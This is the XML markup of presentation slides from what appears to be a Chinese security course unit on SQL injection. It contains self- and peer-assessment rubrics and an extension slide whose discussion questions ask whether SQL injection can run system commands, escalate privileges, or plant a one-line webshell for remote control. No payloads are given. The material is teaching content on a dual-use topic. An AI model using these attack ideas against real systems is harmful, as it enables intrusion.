            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6634020" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>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01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="24" name="表格 23"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2295525" y="2428240"/>
          <a:ext cx="8157845" cy="3762375"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1069975"/>
                <a:gridCol w="4220210"/>
                <a:gridCol w="527685"/>
                <a:gridCol w="1169035"/>
                <a:gridCol w="1170940"/>
              </a:tblGrid>
              <a:tr h="282575">
                <a:tc gridSpan="5">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学生自评表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a:noFill/>
                    </a:lnL>
                    <a:lnR cap="flat">
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT cap="flat">
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                    <a:lnTlToBr>
                      <a:noFill/>
                    </a:lnTlToBr>
                    <a:lnBlToTr>
                      <a:noFill/>
                    </a:lnBlToTr>
                    <a:noFill/>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T cap="flat">
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr>
                    <a:lnR cap="flat">
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT cap="flat">
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB w="12700" cap="flat" cmpd="sng">
                      <a:solidFill>
                        <a:srgbClr val="000000"/>
                      </a:solidFill>
                      <a:prstDash val="solid"/>
                      <a:headEnd type="none" w="med" len="med"/>
                      <a:tailEnd type="none" w="med" len="med"/>
                    </a:lnB>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="281940">
                <a:tc gridSpan="5">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项目名称：6.2 SQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>注入漏洞</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28257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班级：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学号：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姓名：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日期：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321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分值</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6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1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>SQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>注入漏洞的基本原理</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400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eaLnBrk="0" hangingPunct="0">
                        <a:spcBef>
                          <a:spcPct val="20000"/>
                        </a:spcBef>
                        <a:buClr>
                          <a:srgbClr val="CC0000"/>
                        </a:buClr>
                        <a:buSzTx/>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>SQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="0">
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>注入漏洞的利用与防御</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN"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086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21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1940">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2575">
                <a:tc gridSpan="2">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合计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sz="1600" b="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a: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【任务评价】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="485775" cy="388620"/>
            <a:chOff x="-9" y="201"/>
            <a:chExt cx="765" cy="612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="矩形 18"/>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20" name="矩形 19"/>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17"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533756" y="1853381"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId5"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="4572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9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="矩形 1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6"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="3067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endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="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sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId7"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="1754191"/>
              <a:ext cx="140208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微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</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16" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId8"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6642275" y="1914354"/>
              <a:ext cx="450850" cy="368300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2239645" y="3088640"/>
          <a:ext cx="7713345" cy="1846580"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="909955"/>
                <a:gridCol w="452755"/>
                <a:gridCol w="923290"/>
                <a:gridCol w="827405"/>
                <a:gridCol w="891540"/>
                <a:gridCol w="824865"/>
                <a:gridCol w="459105"/>
                <a:gridCol w="459740"/>
                <a:gridCol w="458470"/>
                <a:gridCol w="461645"/>
                <a:gridCol w="520065"/>
                <a:gridCol w="524510"/>
              </a:tblGrid>
              <a:tr h="304800">
                <a:tc gridSpan="12">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>学生互评表</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"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304800">
                <a:tc gridSpan="12">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>项目名称：</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="1600"/>
                        <a:t>6.2 SQL注入漏洞</a:t>
                      </a:r>
                      <a:endParaRPr sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="268605">
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>评价项目</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>分值</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc rowSpan="2" gridSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="200000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>等级</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc rowSpan="2" hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="2" hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="2" hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc gridSpan="6">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>评价对象 (组别)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="412750">
                <a:tc vMerge="1">
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc vMerge="1">
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc vMerge="1" gridSpan="4">
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>5</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>6</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
              </a:tr>
              <a:tr h="555625">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr" fontAlgn="auto">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>成果展示</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr" fontAlgn="auto">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr" fontAlgn="auto">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>优(9-10)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr" fontAlgn="auto">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>良(8-9)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr" fontAlgn="auto">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>中(6-7)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" algn="ctr" fontAlgn="auto">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t>差(1-5)</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r>
                        <a:rPr lang="en-US" sz="1600"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr indent="0" fontAlgn="auto">
                        <a:lnSpc>
                          <a:spcPct val="150000"/>
                        </a:lnSpc>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="0" marR="0" marT="0" marB="0" vert="horz" anchor="t" anchorCtr="0"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务拓展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="485775" cy="388620"/>
            <a:chOff x="-9" y="201"/>
            <a:chExt cx="765" cy="612"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="矩形 1"/>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3" name="矩形 2"/>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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-280670"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2 SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入漏洞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
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"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custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="693420" y="2037080"/>
            <a:ext cx="10506075" cy="314007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eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入攻击只能造成信息泄露吗？</a:t>
            </a:r>
            <a:endParaRPr sz="240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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者可以调用数据库中的函数来执行系统命令？</a:t>
            </a:r>
            <a:endParaRPr sz="240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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者可以通过利用SQL注入攻击来提升权限？可以获得管理员权限？</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="p"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>攻击者利用SQL注入攻击可以进行写数据操作？可以将木马程序（如一句话木马）写入服务器的文件中，最终实现远程控制？</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="469900" indent="-469900" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="o"/>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094846" y="-203755"/>
              <a:ext cx="1386784"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03</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sz="4000" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
